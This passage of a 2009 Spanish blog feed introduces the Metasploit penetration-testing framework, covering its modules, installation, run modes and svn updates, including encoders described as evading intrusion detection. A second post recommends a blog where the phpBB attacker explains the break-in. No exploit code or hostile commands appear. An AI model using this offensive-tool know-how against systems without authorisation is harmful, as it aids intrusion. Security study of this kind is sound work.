<p><strong><em>- Exploits</em></strong>: Conjunto de scripts escritos en Ruby preparados para aprovechar vulnerabilidades utilizando el Framework.<br />
<strong><em>- Payloads</em></strong>: Conjunto de instrucciones, acciones, comandos, etc que se pueden insertar para ejecutar en los sistemas una vez explotados por medio de un exploit.<br />
<strong><em>- Encoders</em></strong>: Conjunto de herramientas de codificación, sirven para codificar los payloads y con ello evadir sistemas de detección de intrusos.<br />
<strong><em>- NOP&#8217;s</em></strong>: Generadores de instrucciones nulas, hay varios para realizar evasión de detectores de intrusos.<br />
<strong><em>- Aux</em></strong>: Módulos auxiliares, conjunto de utilidades variadas que como veremos en futuros artículos pueden resultar muy interesantes.</p>
<p>A modo de resumen la versión actual de Metasploit v3.2-release viene de serie con el siguiente equipamiento:<br />
<em> =[ msf v3.2-release<br />
+ &#8212; &#8211;=[ 262 exploits &#8211; 117 payloads<br />
+ &#8212; &#8211;=[ 17 encoders &#8211; 6 nops<br />
=[ 46 aux</em></p>
<p><strong>::Cómo obtenerlo:: </strong><br />
Metasploit está licenciado bajo la licencia &#8220;Metasploit LLC&#8221; y es gratuito. Está disponible en la página web oficial y soporta múltiples plataformas: Linux, WIndows, Solaris, MacOS y BSD&#8217;s.<br />
Para estar al día de los cambios en el proyecto, uso de la herramienta y progresos es más que recomendable la lectura del blog oficial.<br />
Instalarlo en Windows es hacer doble click sobre el .exe y siguiente, siguiente.<br />
Sobre Unix descargamos un fichero tar.gz y únicamente tenemos que descomprimirlo.</p>
<p><strong>::Modos de ejecución::</strong></p>
<p>Metasploit puede lanzarse en 3 modos:<br />
<strong><em>- Consola</em></strong>: Es la manera más geek y tosca aunque la que permite un mejor aprendizaje. Sobre ella profundizaré en futuros posts y será la que utilizaré en adelante.<br />
<strong><em>- GUI</em></strong>: Es una interfaz gráfica muy cómoda que permite la ejecución del entorno de manera muy simple. Ideal para Script kiddies.<br />
<strong><em>- Web</em></strong>: Metasploit permite ejecutarse en modo servidor local en la máquina, permitiendo la conexión al mismo mediante un navegador web al puerto 8888. Es otra manera muy sencilla<br />
y cómoda de utilizar la herramienta.</p>
<p>Bajo Windows para ejecutarla tenemos cómodos enlaces en el menu de inicio.<br />
Bajo Unix simplemente ejecutamos los binarios corresponientes: consola (<em>msfconsole</em>), gui (<em>msfgui</em>) y web (<em>msfweb</em>).</p>
<p><strong>::Cómo actualizarlo::</strong><br />
Como todo software que se precie Metasploit se actualiza. Es importante tener la release más moderna pero lo es no solo por seguridad, sino también por una razón muy simple, en este caso tener el entorno<br />
actualizado significa disponer de los últimos exploits bajo la herramienta. En sucesivos posts veremos cómo es posible programar nuestros propios exploits pero de momento únicamente explicaremos como<br />
mantenerla actualizada.<br />
Bajo Windows es tan simple como hacer click en el enlace &#8220;Online update&#8221;. Lo que hace por debajo este enlace es ejecutar el comando &#8220;<em>launcher.rb base updater.rb</em>&#8221;<br />
Bajo Unix no es mucho más complicado, simplemente ejecutar en consola la siguiente secuencia de comandos:</p>
<p><em> $ svn co http://metasploit.com/svn/framework3/trunk/<br />
$ svn update</em></p>
<p>La primera vez dará un error de certificado que tendremos que aceptar.</p>
<p>Hasta aqui la introducción a esta gran herramienta.</p>
<p><strong> ::Referencias y notas::</strong><br />
Pagina oficial:  <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5tZXRhc3Bsb2l0LmNvbS8=">http://www.metasploit.com/</a></p>
<p>Blog oficial:   <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5tZXRhc3Bsb2l0LmNvbS9ibG9nLw==">http://www.metasploit.com/blog/</a></p>
<p><strong><em>NOTA</em></strong>: actualmente La página de Metasploit está sufriendo una serie de ataques de denegación de servicio por lo que de manera temporal han mudado su servicio a la URL <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5tZXRhc3Bsb2l0Lm9yZy8=">http://www.metasploit.org/</a>.</p>
<p class="akst_link"><a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2RtZWRpYW5lcm8uYnlldGhvc3QxNS5jb20vYmxvZy8/cD0yNTcmYW1wO2Frc3RfYWN0aW9uPXNoYXJlLXRoaXM="  title=\"E-mail this, post to del.icio.us, etc.\" id=\"akst_link_257\" class=\"akst_share_link\" rel=\"nofollow\">Compártelo</a>
</p> <img src="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?view=1&post_id=257" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://dmedianero.byethost15.com/blog/2009/02/introduccion-a-metasploit/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Hacked PHPBB</title>
		<link>http://dmedianero.byethost15.com/blog/2009/02/hacked-phpbb/</link>
		<comments>http://dmedianero.byethost15.com/blog/2009/02/hacked-phpbb/#comments</comments>
		<pubDate>Sat, 07 Feb 2009 10:51:12 +0000</pubDate>
		<dc:creator>m313</dc:creator>
				<category><![CDATA[Pentest]]></category>
		<category><![CDATA[phpbb]]></category>

		<guid isPermaLink="false">http://dmedianero.byethost15.com/blog/?p=254</guid>
		<description><![CDATA[Este pots no es para avisar de que este famoso portal ha sido hackeado. Todo el que esté al corriente del mundillo se habrá enterado ya puesto que hay multitud de noticias al respecto.
Lo traigo porque hoy me he encontrado un blog que ha abierto el hacker en cuestión donde explica cómo realizó dicho ataque [...]]]></description>
			<content:encoded><![CDATA[<p>Este pots no es para avisar de que este famoso portal ha sido hackeado. Todo el que esté al corriente del mundillo se habrá enterado ya puesto que <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL25ld3MuZ29vZ2xlLmVzL25ld3M/b2U9dXRmLTgmYW1wO3Jscz1vcmcubW96aWxsYSUzQWVzLUVTJTNBb2ZmaWNpYWwmYW1wO2NsaWVudD1maXJlZm94LWEmYW1wO3VtPTEmYW1wO2hsPWVzJmFtcDt0YWI9d24mYW1wO25vbHI9MSZhbXA7cT1waHBiYitoYWNrZWFkbyZhbXA7YnRuRz1CdXNjYXIrZW4rTm90aWNpYXM=">hay multitud de noticias al respecto</a>.</p>
<p>Lo traigo porque hoy me he encontrado un <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2hhY2tlZHBocGJiLmJsb2dzcG90LmNvbS8=">blog </a>que ha abierto el hacker en cuestión donde explica cómo realizó dicho ataque y las cosas que se fue encontrando, es muy recomendable:</p>
<p><a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2hhY2tlZHBocGJiLmJsb2dzcG90LmNvbS8=">http://hackedphpbb.blogspot.com/</a></p>
<p>Problablemente el blog no tenga continuidad pero es una buena manera de crear una página permaneciendo en el anonimato.</p>
<p class="akst_link"><a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2RtZWRpYW5lcm8uYnlldGhvc3QxNS5jb20vYmxvZy8/cD0yNTQmYW1wO2Frc3RfYWN0aW9uPXNoYXJlLXRoaXM="  title=\"E-mail this, post to del.icio.us, etc.\" id=\"akst_link_254\" class=\"akst_share_link\" rel=\"nofollow\">Compártelo</a>
</p> <img src="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?view=1&post_id=254" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://dmedianero.byethost15.com/blog/2009/02/hacked-phpbb/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
